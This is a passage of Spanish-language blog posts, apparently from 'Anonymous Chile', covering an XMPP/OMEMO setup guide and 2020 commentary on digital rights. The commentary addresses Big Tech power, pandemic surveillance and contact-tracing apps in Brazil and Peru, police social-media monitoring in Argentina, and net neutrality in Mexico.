  • Flexibilidad: Se pueden hacer funcionalidades a medida sobre XMPP; para mantener la interoperabilidad, las extensiones más comunes son gestionadas por la XMPP Software Foundation.

De esta forma, cada usuario, canal o sala en la red XMPP tienen un único identificador (Jabber ID, normalmente abreviado como JID). Para evitar la necesidad de un servidor central con una lista exhaustiva de identificadores, el Jabber ID está estructurado como una dirección de correo electrónico, con un nombre de usuario, canal o sala y una dirección DNS para el servidor en el que reside el mentado usuario, canal o sala en disputa, separado por un signo @. Un identificador Jabber sería algo como nombredeusuario@dominio.com.

Como un usuario puede querer identificarse desde distintos lugares, el servidor permite al cliente especificar una cadena de referencia conocida como recurso, que identifica el cliente que está utilizando el usuario (por ejemplo: casa, trabajo, portátil, etc.), lo cual NO aplica para canales o salas. Esto será incluido en el JID añadiendo un carácter / seguido del nombre del recurso. Cada recurso debe tener especificado un valor numérico de prioridad. Por ejemplo el JID completo de la cuenta del trabajo del usuario sería: nombredeusuario@dominio.com/trabajo. De esta forma, los mensajes de la forma nombredeusuario@dominio.com serán dirigidos al cliente con mayor prioridad, y los de la forma nombredeusuario@dominio.com/trabajo serán dirigidos al cliente del trabajo. Los JID sin la parte del nombre de usuario también son válidos y se utilizan para enviar mensajes de sistema y control.

Poniendo todo esto en un sencillo ejemplo, supongamos que alice@hackers.com desea chatear con bob@anonymous.net. Alice y Bob tienen sus respectivas cuentas en los servidores hackers.com y anonymous.net. Cuando Alice escribe y envía su mensaje, entra en acción la siguiente secuencia de eventos:

  1. El cliente de Alice envía su mensaje al servidor hackers.com, pero si el servidor de Alice y/o el de Bob no se encuentran disponibles, el mensaje es desechado.
  2. El servidor hackers.com abre una conexión con el servidor anonymous.net.
  3. El servidor anonymous.net entrega el mensaje a Bob, pero si Bob no se encuentra disponible, el mensaje es guardado para su posterior entrega.

Entonces ahora, para ingresar a las redes XMPP primero se debe buscar un cliente compatible con OMEMO según el sistema operativo del equipo o máquina a utilizar. Para saber qué clientes XMPP soportan OMEMO, debe dirigirse a la página web «Are we OMEMO yet?» y para encontrar una red XMPP viable debe dirigirse al sitio web «XMPP Servers» en donde hallará servidores para todos los gustos, ubicados en todo el mundo y con múltiples medidas de seguridad intentando proteger la privacidad de sus usuarixs y los mensajes transferidos. No obstante, se debe recordar que no importa donde se registre la cuenta JID, debido a la naturaleza descentralizada y federada de XMPP siempre podremos contactar con cualquier otrx(s) usuarix(s) o canal(es) ubicadx(s) en cualquier otra red, servidor o nodo federado de XMPP.

Una vez instalado un cliente a su gusto, medida y preferencia, puede utilizar el mismo para registrarse ya que algunas redes solamente permiten el registro de nuevas cuentas o direcciones jabber (JID) mediante algun cliente, así como otras solamente permiten el acceso mediante la web mientras las demás exigen el uso de determinados clientes o restringen el acceso desde determinadas redes de Internet, pero por lo general cada nodo XMPP debería federar con todos los demás sin problemas y de no ser así puede contactar a su administrador para consultar al respecto.

Para el uso de OMEMO en su cliente, asumiendo que utiliza alguno que lo soporte, intente buscarlo entre las extensiones o configuraciones del mismo, de lo contrario busque en su respectiva página web cómo instalarlo. Aunque usualmente debería venir integrado y habilitado por defecto, siempre es bueno y mejor asegurarse y verificar de que se encuentre activado, adecuadamente configurado y en uso.

Finalmente luego de conectarse a su cuenta XMPP con el cliente de su preferencia, OMEMO habilitado, activado y configurado, estará listx para comenzar a integrarse en los canales y salas de las múltiples redes disponibles o contactar a sus amistades y familiares que también utilicen XMPP. Puede buscar salas o canales entre los diferentes nodos y servidores XMPP; muchos proyectos soportan este medio de mensajería instantánea y sin importar donde se encuentre registradx y conectadx usted, podrá ingresar sin dificultades.

La pandemia digitalizada

Publicada el 29/05/2020 - 11/07/2021 por Anonymous Chile

Reflexiones sobre el poder que le estamos dando a las grandes corporaciones tecnológicas, un virus también muy peligroso

Estamos en tiempos convulsos pero sobre todo, complejos. El autoritarismo digital con el que ya convivíamos a diario sin protestar llega ahora en el formato de ‘estado de emergencia’. Y en las situaciones de emergencia queremos que nos digan qué hacer, permitimos que se haga ‘lo que sea’ en nombre de la ‘seguridad’. La interdependencia global en la que ya convivíamos se hace más elocuente en tiempos de coronavirus y ese autoritarismo digital vio una oportunidad de negocio servida en bandeja.

Rápidamente Google y Amazon se ofrecieron gentiles a ser los proveedores de servicios digitales para poder responder a la hiperconexión [¿más aún?] frente a la situación de emergencia.

La tecnología no es ni neutral, ni inmaterial. Se estima que los centros de datos donde se aloja nuestra navegación diaria son los responsables de entre el 3% y el 7% de los contaminantes globales. Y, para enero de 2019, el mundo tenía más basura electrónica que humanos. Como dicen en el documental Cuando deje de llover “nuestra agua refleja nuestro comportamiento, tarde o temprano todo lo que hacemos, usamos o poseemos termina en el agua”.

Esta es apenas la punta del iceberg de la contaminación ambiental, dejando fuera las implicaciones de la contaminación que produce a la libertad de pensamiento el hecho de que sean unas pocas empresas las que determinan lo que vemos y leemos.

En tiempos de captura corporativa donde las multinacionales tienen más poder que los propios estados nacionales, mudarnos definitivamente a la ‘nube’ [a sus ‘nubes’] les dará más control sobre nuestras vidas cotidianas, nuestra intimidad, deseos, enojos… y miedos [¿para volver a empezar el ciclo de una futura ‘situación de emergencia’?] Como dice la canción «Dame el poder» de la banda musical mexicana «Molotov», corremos el riesgo de que ‘si le das más poder al poder, más duro te van a venir a joder’.

Internet fue pensado como un espacio de expansión de libertades. En los años ‘60 ese ‘poder’ estaba representado por gobiernos todopoderosos. El abuso de poder estaba en manos de gobiernos a los que había que ponerles un ‘freno’ e internet quería ser un espacio de libertades ciudadanas, autónomas, creativas, compartidas. Internet no pensó que las empresas serían un problema. Se limitó el poder de los gobiernos pero no de esas [futuras] empresas.

Con los años, Internet se redujo a la web que es una pequeña parte de esa gran red [la que nos permite navegarla escribiendo en lenguajes humanos y no en lenguajes de máquinas] y en los tiempos que corren, la web se redujo a plataformas: ya no navegamos la web en busca de opciones y aprendizajes. Nos encandilan los focos de Google, Amazon, Zoom, Netflix, Facebook… Para muestra, un botón: Amazon aloja el 50% de la nube del mundo. Eso quiere decir que Amazon ‘posee’, el 50% de los datos de la nube [o sea nuestros datos].

Una ecuación que parece simple: + conexión = + control + huella digital + huella ecológica.

Para quienes habitamos internet antes y después de las .com conocimos [al menos dos] formas antagónicas de habitarlo: la de la exploración y la del control. Poco a poco quienes se fueron apropiando se esa red fueron startups ingeniosas que venían a traernos soluciones tecnológicas que nos permitirían navegar Internet con mínimos conocimientos porque, ¿para qué necesitamos ‘entender’ si tenemos ‘expertos’ que pueden hacerlo por mi? Nos hicieron dependientes de sus servicios porque eran ‘fáciles’ y ‘bonitos’, porque a la vez que creaban dependencia de sus servicios invisibilizaban de una manera eficaz lo que sacaban a cambio. Porque la inmaterialidad en la que dicen basarse, se hace material en territorios a kilómetros de distancia de los nuestros, o al menos a kilómetros ‘emocionales’ de distancia. Las empresas de internet solo se muestran como historias de éxito donde unas pocas personas ganan millones de dólares al año y el resto de las personas que construyen la materialidad de internet quedan completamente invisibilizadas. Internet cayó también del lado del neoliberalismo.

Desde los gobiernos de turno se han impulsado políticas para ‘moverse a la nube’ porque se cree que es más barato, desconociendo una vez más la externalización de los ‘pasivos’: personas que a diario ‘tiran’ cables, levantan antenas, moderan contenidos, extraen minerales. Le confiamos todo a la Red porque creemos que es mejor y más barato.

Las empresas y el extractivismo de datos en los que se centran las economías de esas empresas se mezclan con las políticas de austeridad alimentando la crisis. En lugar de tomar la crisis como una oportunidad para crecer hacia adentro, para aprender más sobre cómo funciona esa Red de la que tanto dependemos y construir un entorno que permita explorar en diversidad, los gobiernos corrieron a comprar las soluciones de negocio de los grandes corporativos. Con esta acción, impusieron una reducción de la libertad digital tan grande como la cuarentena física. Las administraciones públicas decidieron privatizarse más en lugar de invertir en infraestructura propia. Y mucho menos apoyar los proyectos de autonomía digital que ya caminan en el mundo.

Marta Peirano suele decir que el mercado de los datos es un mercado goloso, deseoso de más y más información. Y esos datos, nuestros datos, importan por la mezcla jugosa que sale de ellos. Porque mezclados, y usando algoritmos, se puede predecir el futuro de una forma más tangible y concreta. Se materializa el viejo dicho que dice que la información es poder, ahora en la forma concreta y tangible de poder conocer y cambiar el futuro: “cuando entiendes cómo funciona la sociedad puedes hacer cosas para modificar su conducta. Las tecnologías que usamos pueden introducir variables y saber inmediatamente si estas variables están funcionando como lo esperaban o no”.

Una frase del filósofo surcoreano Byung Chul-Han resumen un cambio de época: “Nadie sabe cuándo terminará el aislamiento capsular. La ya evolucionada digitalización de la vida avanzó cincuenta años en cinco días. Y sabemos que la tecnología nunca retrocede. Cuando esto termine, estaremos más habituados a estar entre paredes, rodeados de pantallas planas como ventanas a un mundo que ha perdido el horizonte. El windowing -al decir de Han- se impondrá cada vez más como el modo de la experiencia perceptiva: estar en el mundo será estar frente a la ventana”.

Alguien[es] van a salir fortalecidos de esta crisis. Con estas acciones en el plano digital serían, sin lugar a dudas, las corporaciones que ya estaban dominando los mercados internacionales [no los mercados tecnológicos, sino los mercados de distintos rubros].

El problema no es Internet. El problema de Internet es tener que lidiar con su propio virus, uno que lo asecha quitándole el aire. Démosle un respiro a esa Red que tanto nos significa en nuestras vidas [re]construyendo espacios de libertad y autonomía. Yendo más allá de los espacios delimitados por el virus representado por las grandes tecnológicas. No podemos salir de esta crisis habiendo perdido lo poco que nos queda de privacidad. “Tenemos que mantenernos vigilantes porque no podemos llegar a ese nuevo escenario con menos derechos de los que tenemos hoy”, dicen por ahí.

No, no estamos apelando a que los estados nación nos den respuestas. Ya hemos constatado el tipo de respuesta que pueden dar. Podemos ser sus ‘aliados’ de cuando en cuando pero la propuesta no es que reemplacen nuestra propia soberanía social.

Permitámonos desconectar de las tecnologías digitales y conectar con nuestros entornos cercanos. Pero también, al habitar las tecnologías digitales, permitámonos explorar propuestas y servicios que apoyan la creatividad y el conocimiento. La mejor manera de habitar la Red es desde la curiosidad, es no quedarnos en las primeras páginas de los resultados de unas búsquedas que indefectiblemente nos mostrarán las respuesta más populares o ‘a la medida’. Las posibilidades están en las grietas. Ahora que ‘tenemos tiempo libre’ exploremos las grietas de Internet, conectemos con lo ‘desconocido’ para crear nuevas posibilidades de futuro que nos permitan salir de la crisis fortalecidas como sociedades ‘de abajo’.

Covid-19 causa estragos en Brasil, la privacidad y derechos del pueblo

Publicada el 28/05/2020 - 05/08/2021 por Anonymous Chile

Mientras el gobierno federal aprovecha la emergencia de salud para retroceder en derechos fundamentales, estados y municipalidades desarrollan soluciones de control y vigilancia junto al sector privado, sin atender a principios de privacidad y protección de datos, y poniendo en riesgo a las poblaciones más vulnerables.

Brasil es actualmente el sexto país del mundo en número de víctimas del COVID-19, con más de 13 mil muertes hasta el momento.La manera como el presidente brasileño ha respondido al avance del coronavirus en el país ha llamado atención internacional. Como si no bastara con la negligente, ignorante, arrogante, testaruda, egocéntrica y altanera actitud o comportamiento del presidente Jair Bolsonaro con las más de 10 mil víctimas, sus familias y todo el pueblo de su país, él insiste en hacer apariciones públicas contrariando las recomendaciones de aislamiento social de las expertas en salud y los gobiernos locales. Al avance del COVID-19 se suman otras enfermedades y una crisis política que incluye la dimisión de dos ministros – incluso el ministro de salud responsable por las primeras respuestas a la pandemia – y una denuncia de intentar manipular la policía federal en beneficio personal.

Menos transparencia, más intrusión

A pesar de las declaraciones del presidente en contra de la cuarentena y a favor de dudosas soluciones al COVID-19, en su ya tradicional estrategia de polarización política, el Gobierno Federal no ha perdido la oportunidad de usar la emergencia de salud para atentar contra los derechos conquistados. El 23 de marzo, por medio de una medida provisional, ha intentado restringir los mecanismos existentes de transparencia y acceso a la información al suspender por tiempo indeterminado los plazos máximos de respuesta a solicitudes a instituciones públicas. La acción fue considerada desproporcionada e inconstitucional por organizaciones nacionales e internacionales de la sociedad civil y terminó anulada por la Suprema Corte Federal.

Mientras intenta ocultar sus acciones del ojo público y se muestra incapaz de ofrecer informaciones oficiales de calidad sobre el avance de la crisis, el gobierno busca obtener más poderes sobre los datos personales de la ciudadanía. Nuevamente aprovechando la emergencia de salud, por medio de otra acción unilateral, ha retrasado la entrada en vigencia de la primera ley de protección de datos del país para mayo de 2021 – casi un año después de lo inicialmente previsto.

La acción dialoga con el intento del gobierno de apoderarse de información privada por medio de una medida provisional del 17 abril que autorizaba el acceso de la autoridad estadística nacional a datos telefónicos de millones de personas. Según el texto, las empresas telefónicas deberían entregar el nombre, número de teléfono y dirección de todos sus clientes para facilitar la realización de encuestas en el período de emergencia de salud pública. La reacción fue inmediata, con la presentación de cinco acciones de inconstitucionalidad ante la Suprema Corte, que rápidamente decidió por suspender sus efectos. La mayoría de los ministros entendió que la transferencia de los datos de empresas telefónicas viola el derecho a la intimidad, vida privada y secreto de datos previsto en la Constitución.

Aunque algunas medidas hayan sido acertadamente anuladas por el Poder Judicial, estas se contraponen directamente a las recomendaciones de expertas y expertos en derechos humanos de las Naciones Unidas, con respecto a que “cualquier respuesta de emergencia al coronavirus debe ser proporcionada, necesaria y no discriminatoria”.

Sin límites para vigilar

La ausencia de una respuesta coordinada de parte de la autoridad federal ha dejado la responsabilidad de desarrollar estrategias para contener el avance del COVID-19 a los estados de la unión. A pesar de algunas variaciones en la rigidez de las medidas de aislamiento social, las soluciones adoptadas combinan restricciones de movilidad con monitoreo y control tecnológico.

Cuando se trata del uso de datos de conexión a la red celular, la municipalidad de Rio de Janeiro fue pionera en establecer un acuerdo con una operadora para identificar flujos de movimiento. La estrategia se complementa con el uso de drones para emitir alertas en caso de aglomeraciones en la ciudad, que cuenta con un aparato de vigilancia heredado de los megaeventos deportivos realizados en Brasil. El estado de São Paulo también estableció una alianza que involucra no a una, sino a todas las empresas de telefonía celular operando nacionalmente. Siguiendo su ejemplo, hasta fines de abril 15 estados y 2 ciudades habían buscado soluciones similares.

Otras localidades han obtenido informes de movilidad basados en datos de geolocalización ofrecidos por la empresa In Loco especializada en su recolección y uso para fines de vigilancia y publicidad. La mencionada dispone de una base de datos de alrededor de 60 millones de dispositivos monitoreados por medio de códigos incorporados en aplicaciones de celular. Además de calcular índices de aislamiento social, la solución permite alertar personas individualmente en caso de que se identifique un nivel de movimiento superior a la media esperada.

Llama la atención la adopción de estrategias que pueden facilitar acciones discriminatorias. En Florianópolis, por ejemplo, el sistema implementado permite notificar por SMS a las habitantes de una región si una persona en las cercanías de su casa fue diagnosticada con COVID-19. Este tipo de alerta puede incentivar intentos por ubicar el caso o levantar sospechas que lleven a actos de exclusión. La herramienta fue desarrollada por un grupo de empresas locales de tecnología y usa datos de la municipalidad para identificar a quien destinar los mensajes. La solución permite suponer que las empresas tienen acceso a informaciones sensibles, como la identificación y dirección de personas infectadas, lo que también es preocupante debido al desconocimiento de potenciales usos futuros de los datos y sus consecuencias.

Un grupo adicional de aplicaciones ha sido lanzado por estados y municipalidades para brindar información a la población y permitir el autodiagnóstico. Este tipo de solución también busca apoyar al Estado a identificar y hacer una estimación de los nuevos casos en un contexto de escasez de tests. Un estudio desarrollado por InternetLab muestra preocupantes niveles de intrusión de algunas aplicaciones de este tipo y sus deficiencias en términos de consentimiento, necesidad, transparencia y seguridad.

Una crisis más allá de la salud

La falta de transparencia sobre los términos de las alianzas público-privadas detrás de gran de parte de las iniciativas de monitoreo mencionadas tiene como consecuencia la ausencia de garantías expresas de que los datos no serán utilizados para otros fines o de que medidas suficientes de seguridad serán implementadas. En el caso de São Paulo, incluso hay sospechas de que el acceso a la información de datos de celular por parte del gobierno se inició antes de la firma del acuerdo con las empresas.

Sumada a la postergación de la ley de protección de datos personales y la ausencia de una autoridad nacional de protección de datos hasta la fecha, se abre el margen de posibilidad de abusos por agentes públicos y privados, dejando la población más vulnerable aún más expuesta a la discriminación durante y después de la pandemia. Es decir, lejos de ser una crisis que golpea a todos por igual, la crisis de gobernanza y de protección de derechos que ha producido la acción conjunta de estados y empresas ha asegurado que los mayores perjudicados sean las personas más vulnerables del país.

Como se ha señalado anteriormente, “necesidad, adecuación y proporcionalidad en la respuesta tecnológica es lo que separa una crisis de salud global de una renuncia de los derechos fundamentales, tejido básico de sociedades como las nuestras, que se han jugado su sangre e historia por escapar del autoritarismo y garantizar una vida digna para todos”. La ausencia de esos criterios también puede ser, y es, literalmente fatal. Las víctimas no se distribuirán uniformemente en la sociedad brasileña. Ellas ya tienen género, color y lugar de origen.

Bluetooth como alternativa al GPS y triangulación de señales telefónicas

Publicada el 28/05/2020 - 01/08/2021 por Anonymous Chile

Frente a las desventajas ya observadas en el uso del GPS, la triangulación de señales o aparatos telefónicos y su impacto en la privacidad de las personas, se ha discutido una idea aparentemente innovadora que podría resolver todos los problemas anteriores: usar Bluetooth. A diferencia del GPS, las aplicaciones basadas en Bluetooth tienen las siguientes ventajas:

  • Son más precisas en el trabajo de identificar un dispositivo cercano.
  • Pueden funcionar en entornos cerrados donde la señal móvil es un problema como edificios o estacionamientos subterráneos.
  • No necesitan estar conectado a una red o a Internet todo el tiempo para funcionar.
  • No recogen la información de la localización geográfica ni el recorrido de sus usuarixs.
  • No consumen mucha energía del equipo.

¿Pero cómo funciona una aplicación de rastreo de contactos basada en Bluetooth? La propuesta de la mayoría de aplicaciones y plataformas que la han implementado o piensan hacerlo es la siguiente. Cada teléfono tiene asignado un identificador único que se emite mediante la señal Bluetooth, de tal manera que otro teléfono pueda «escuchar su identificador» cuando lo tenga cerca. Algo así como si cada teléfono gritara un pseudónimo de su dueño mientras este va por la calle. De esta manera, cada vez que un dispositivo detecte una señal cercana (o sea, escuchen los “gritos” de otro teléfono), almacenarán dicho identificador localmente, formando poco a poco un historial de todos los teléfonos, y por lo tanto personas, que han estado cerca de el/la usuarix.

Aquí es donde se inicia otro punto de discusión. Por un lado tenemos el modelo centralizado, como se decidió en países como Inglaterra o Alemania, donde se almacena centralmente la información de a quién corresponde cada identificador. Por otro lado, existe un modelo descentralizado, que se ha implementado en países como República Checa con e-Rouska, donde cada teléfono mantiene la lista de los identificadores que en algún momento le fue asignado.

En este último diseño, por ejemplo, se analiza la información de manera descentralizada. Cuando un/a usuarix de la aplicación es diagnosticado positivo, las autoridades de salud pueden acceder a la lista de identificadores que su teléfono ha generado durante todo el tiempo que ha tenido instalada la aplicación. Aunque son únicos, estos identificadores van cambiando de forma frecuente, por lo que podría haber más de uno para cada usuarix o teléfono. Luego, esta lista se envía a lxs demás usuarixs de la aplicaciones, para que busquen si en algún momento se han cruzado con el usuario diagnosticado positivo. Este procedimiento sería automático y, cuando existan coincidencias, lxs usuarixs que estuvieron cerca del contagiado reciben una alerta para que tomen medidas de prevención y diagnóstico.

Este enfoque descentralizado también ha sido adoptado por Google y Apple en un trabajo conjunto para poner a disposición APIs que simplifiquen el desarrollo de aplicaciones con este tipo de tecnologías. A pesar que esta API estará disponible para todos lxs desarrolladorxs únicamente instituciones de salud del gobierno estarán autorizados de publicarla en las tiendas oficiales de App Store y Play Store.

Desde el punto de vista de privacidad, el método descentralizado parece mejor ya que estos identificadores únicos no son almacenados en el servidor de alguna institución del gobierno. Lo que no solo reduce la posibilidad de que sean explotados para otros fines, sino también evita que nuestra seguridad dependa de la seguridad informática de ese servidor. Además, el acceso a la lista de contactos cercanos con lxs otrxs usuarixs se realiza solo en el caso de lxs contagiadxs y previo consentimiento.

¿Bluetooth solucionará el problema?

A pesar de que este procedimiento se presenta como novedoso, existe registro de una aplicación similar lanzada en 2011 por investigadores de la Universidad de Cambridge. En esa oportunidad, sus creadores intentaron hacer un seguimiento de la manera en la que la gripe se propaga dentro de su población. ¿Funcionó? no, principalmente por la poca adopción que obtuvo la aplicación entre la población a la que iba dirigida (1%).

Por más buenas ideas que se hayan presentado y tecnologías que las soporten, el principal problema con cualquier aplicaciones es su adopción de parte de lxs usuarixs. Aún siendo optimistas, si la tecnología en sí misma es todo lo que promete ser, todavía está el reto de que todo el público objetivo descargue la aplicación. El problema es que el público objetivo es todo el país. No obstante, si esta aplicaciones fuera diseñada únicamente para lxs doctorxs o enfermerxs, podría tener un alcance inmediato y mayor.

Otro problema evidente es que que no todxs lxs ciudadanxs tienen un smartphone con la última versión de sus sistemas operativos (Android o iOS) o un teléfono sencillo siquiera. Pero aun si lo tuvieran, ¿cómo garantizar que van a descargar la aplicacion y la mantendrán activa mientras se desplazan? Aun si la hicieran de uso obligatorio, ¿cómo harían ese control? Singapur, el país que es considerado como ejemplo del uso de estas tecnologías y que tiene un gran porcentaje de su población educada digitalmente, tan solo tiene un índice de adopción menor al 30% con su aplicación TraceTogether.

La aplicación Perú en tus Manos, por ejemplo, tiene más un millón de descargas en la Play Store de Android. Aunque es un buen número para una aplicación peruana, todavía representa un porcentaje muy pequeño de la población, que actualmente debe ascender a más 30 millones. A pesar de las observaciones técnicas realizadas, todavía no es claro el rumbo de esta aplicación que no se ha actualizado desde el 13 de abril y que a pesar de pedir permisos de Bluetooth desde su lanzamiento el 03 de abril, no ha implementado la tecnología de Contact Tracing descrita anteriormente.

Una aplicación es una herramienta de intercambio de información muy potente. Por lo mismo, es necesario que se diseñe desde principio generales sólidos como reducir la acumulación de información y respetar la privacidad de lxs usuarixs. No obstante, su creación misma y despliegue no cambiará los hábitos de las personas, ni tampoco puede ser una solución del deficiente sistema de salud, de la brecha digital y de otros problemas que venimos arrastrando como sociedad y que se han hecho más evidentes durante esta Emergencia Nacional.

Ciberpatrullaje: La nueva estrategia de vigilancia como amenaza para la privacidad en Argentina

Publicada el 27/05/2020 - 01/08/2021 por Anonymous Chile

La ministra de Seguridad, Sabina Frederic, prendió las alarmas la semana pasada luego de señalar que el ciberpatrullaje iba a ser utilizado para detectar el humor social de la gente para prevenir eventuales saqueos o desbordes.

En realidad esta modalidad, que se viene utilizando desde hace años, fue creada para combatir el terrorismo, narcotráfico, grooming, violencia de género y amenazas, entre otros, que se llevan a cabo dentro de la web.

En un momento en donde el uso de las redes sociales se convirtió en la única conexión con el afuera, las palabras de la ministra, de las cuales luego de retractó ante las reacciones negativas, generaron un gran revuelo, sumado al desconocimiento que existe sobre este patrullaje cibernético y el miedo de que esta práctica pueda interferir en la libre expresión o violar los derechos individuales, como también la libertad colectiva.

¿Qué es el ciberpatrullaje?

Para entender un poco más sobre el tema, el abogado de la Asociación por los Derechos Civiles (ADC), Eduardo Ferreyra, que trabaja en temas de derechos humanos en el ámbito digital, explicó: ‘El ciberpatrullaje se refiere a las técnicas y tecnologías que permiten a quien las usa el monitoreo activo de redes sociales. Por esto me refiero al monitoreo de contenido como mensajes, posteos, imágenes y todo lo que uno publica en alguna red social. Para esto, se realizan actividades de recolección, almacenamiento y análisis de los datos recolectados para transformarlo en alguna información que sea importante para el que hace el monitoreo.’

Este tipo de patrullaje ciberéntico fue implementado en Argentina por la ex ministra Patricia Bullrich y continuó con el actual gobierno. ‘Nosotros venimos criticando la conformación de las áreas de ciberpatrullaje entre las fuerzas federales desde hace muchos años’, señaló Beatriz Busaniche, docente en la Universidad de Buenos Aires y en FLACSO, y presidente de la Fundación Vía Libre, que tiene como objetivo defender los derechos fundamentales en el entorno digital.

Busaniche habló de lo que también se conoce como inteligencia de fuente abierta (open source intelligence), una práctica ‘lamentablemente generalizada que esta reñida con el estado de derecho’. La misma, según explicó ‘vulnera dos aspectos fundamentales’.

‘El primero es la privacidad de las personas que, por más de que se esté monitoreando sus expresiones en la esfera pública, como pueden ser las redes sociales, tienen una expectativa de privacidad en la que esperan que no se haga seguimiento de sus expresiones, no se haga recolección y no se haga tratamiento de esa información porque eso constituye tareas de inteligencia’.

Por otro lado, Busaniche remarcó que esta práctica ‘ejerce una forma de condicionamiento del discurso público y esto entonces tiene un impacto sobre el derecho de libertad de expresión de las personas‘. Dio como ejemplo las acciones de ciberpatrullaje que realizaba la ex ministra Bullrich en su momento con detenciones y allanamientos de personas por sus expresiones ‘específicamente en Twitter’.

En esa misma línea, Ferreyra habló sobre las consecuencias que esto puede traer y cómo puede modificar la conducta de los internautas. ‘Si uno sabe que todo lo que comenta, postea, publica, etc, está siendo vigilado por las fuerzas de seguridad, muy probablemente se inhibirá de emitir, por ejemplo, alguna opinión crítica al poder de turno.’

“En contexto como el actual, en donde no podemos ejercer la libertad de expresión en las calles, resulta más necesario que nunca que los ciudadanos tengan confianza en que podrán criticar, protestar o cuestionar a la autoridad a través de Internet”.
Eduardo Ferreyra

¿Se le puede poner fin o llegó para quedarse?

Después del escándalo que se generó en torno al ciberpatrullaje y sus cuestionados métodos, la ministra Frederic expresó su intención de volver más transparente el proceso a través de la creación de protocolos y consultas con diversos sectores, incluidas las organizaciones de defensa de derechos, aunque a su vez aseguró que se continuará utilizando esta práctica.

‘Yo espero que esto se termine porque efectivamente, al menos como se está haciendo en Argentina, no tiene ninguna utilidad ni en términos de seguridad pública ni en términos de libertad de expresión y derechos de la privacidad’, sostuvo Busaniche.

Al respecto, Ferreyra indicó que si el Estado decide continuar con esta modalidad ‘debería limitar al máximo posible su uso mediante evaluaciones exhaustivas de cuando estas herramientas son necesarias y proporcionadas para lograr objetivo buscado, como también debería permitir auditorías periódicas por parte de un órgano independiente que supervise la manera en que se llevan a cabo’.

Luchemos por una Internet abierta, libre, neutra y diversa

Publicada el 26/05/2020 - 23/06/2021 por Anonymous Chile

Una iniciativa sobre gestión de tráfico en México amenaza Internet y su neutralidad como la conocemos, acá te explicamos por qué y cuáles son sus riesgos:

¿Qué es la neutralidad de la red?

Internet nació como una plataforma de libre acceso, que no discrimina contenidos ni sitios (a menos que sean ilegales). Es decir, un espacio abierto donde cabe toda la información y todas las personas. La neutralidad de la red es el principio bajo el cual los proveedores de internet (como VTR, GTD Manquehue, Telmex, AT&T, Telefónica Movistar) gestionan el tráfico en línea sin abusos y sin discriminar por origen, destino, aplicación, contenido o tipo de datos.

De esta forma, tú como usuario/a eliges qué ver en internet, sin que tu proveedor te limite, bloqueé contenidos o favorezca ciertas aplicaciones. Este principio fomenta la diversidad y competencia más justa pues permite que entren fácilmente nuevas aplicaciones, contenidos y servicios sin tener que negociar con grandes empresas.

¿Qué amenaza a Internet?

Actualmente, una anteproyecto del Instituto Federal de Telecomunicaciones amenaza la neutralidad de la red en México y pone en juego una internet libre.

¿En serio queremos que Internet se quede en manos de unos cuantos? Te explicamos (con memes y gifs) los riesgos que este anteproyecto implica:

1.- Quien paga, manda

Los proveedores de internet podrían priorizar contenidos, apps y servicios con quienes tengan acuerdos económicos y bloquear a sus competidores o limitar la entrada a nuevas apps, contenidos y servicios. Esto podría significar un aumento en costos para los usuarios.

Por ejemplo, si tu proveedor es AT&T podría cobrarte extra por usar ciertas apps, servicios y contenidos. ¡Imagina que filtraran qué memes puedes consumir!

2.- Internet pertenece al pueblo y queda en manos del pueblo

Si desarrollas aplicaciones emergentes o eres un/a pequeño/a creador/a de contenido en línea no vas a poder llegar tan fácilmente a tus usuarios, pues van a tener prioridad quienes tengan convenios con tu proveedor de internet.

¿Crees que esto es algo exagerado? En Estados Unidos, donde la neutralidad también está en riesgo, se reportó que el proveedor Verizon bloqueó mensajes de texto de una campaña por el derecho a decidir. Es decir, abusó de su poder para censurar un movimiento social.

3.- Tu privacidad está en juego

Para gestionar contenidos y servicios en Internet, los proveedores tienen que monitorear tu actividad en línea. Por ejemplo: qué páginas y apps visitas, con qué frecuencia, etc. Piénsalo así: es como si un servicio de paquetería revisara qué contiene tu paquete para decidir qué tan rápido te lo van a enviar, es decir, qué tan ágil va a ser tu navegación.

4.- ¿Es mala señal o un gobierno abusivo?

El gobierno podría solicitar a los proveedores bloquear aplicaciones, contenidos y servicios por “situaciones de emergencia y seguridad nacional” o si lo pide una «autoridad competente”. Esto no tiene lineamientos claros, así que no es descabellado pensar que se puede prestar para abusos y censura política.

5.- Ojos que no ven, transparencia que no conocemos

Esta iniciativa no contempla mecanismos suficientes para que usuarios e instituciones podamos evaluar la neutralidad de la red. No existen herramientas de monitoreo y transparencia para darle seguimiento o exigir sanciones en caso de irregularidades y abusos.

¿Qué podemos hacer para ayudar a salvar Internet?

¡Amamos y defendemos Internet! Formamos parte de ella, en línea nos organizamos, creamos redes, información, documentación, unión y comunidad.

Vigilancia y seguimiento para combatir la pandemia en Perú

Publicada el 26/05/2020 - 01/08/2021 por Anonymous Chile

Desde que se conoció el primer caso de Covid-19 en Perú, han surgido múltiples ideas de aplicaciones móviles para entender y contener el impacto que tiene el virus entre nosotros. Una de las ideas más populares es la del uso de tecnologías de seguimiento para rastrear a los contagiados, supervisar el cumplimiento de la orden de aislamiento y prevenir la expansión del virus. Universidades, instituciones del estado y organizaciones de sociedad civil han hecho llamados a decenas de hackatoones, conferencias y múltiples eventos con el fin de encontrar soluciones de este tipo.

El contexto puede variar un poco pero la idea es más o menos la misma en todas las convocatorias: crear una aplicación que permita rastrear y hacer seguimiento del desplazamiento de las personas. Así, cuando un usuarix de dicha aplicación es diagnosticado positivo, el historial de sus ubicaciones anteriores podría ayudar a determinar el riesgo de contagio en diferentes zonas de la ciudad y alertar a las personas con las que el/la contagiadx tuvo contacto. También podría alertar a los demás usuarios cuándo están cerca de una zona de alto riesgo de contagio por la confluencia de contagiadxs.

El razonamiento anterior parece sencillo, pero su implementación está lejos de serlo. A propósito de la nueva estrategia de geolocalización creada por el Gobierno Peruano a través del grupo “Te Cuido Perú” o la aplicación “Perú en tus Manos.” resulta más relevante que nunca conocer los límites técnicos de esta idea. ¿Realmente el seguimiento y geolocalización de las personas ayudará a reducir la cantidad de infectados en el Perú? ¿nos ayudaría a retomar nuestras actividades normales después de la cuarentena? De ser así, ¿cuál sería la tecnología más adecuada para realizarlos? ¿qué medidas deberían tomarse para que se respete nuestra privacidad?

Para poder responder estas preguntas, analizaremos a continuación los beneficios y las desventajas que diferentes tecnologías nos pueden ofrecer. Y es que cuando se propone trabajar con aplicaciones de seguimiento, es fundamental considerar el grado de precisión que podemos obtener, la frecuencia con la que se recolecta la información y el impacto de la aplicación en el consumo de la batería del equipo.

Aplicaciones basadas en GPS

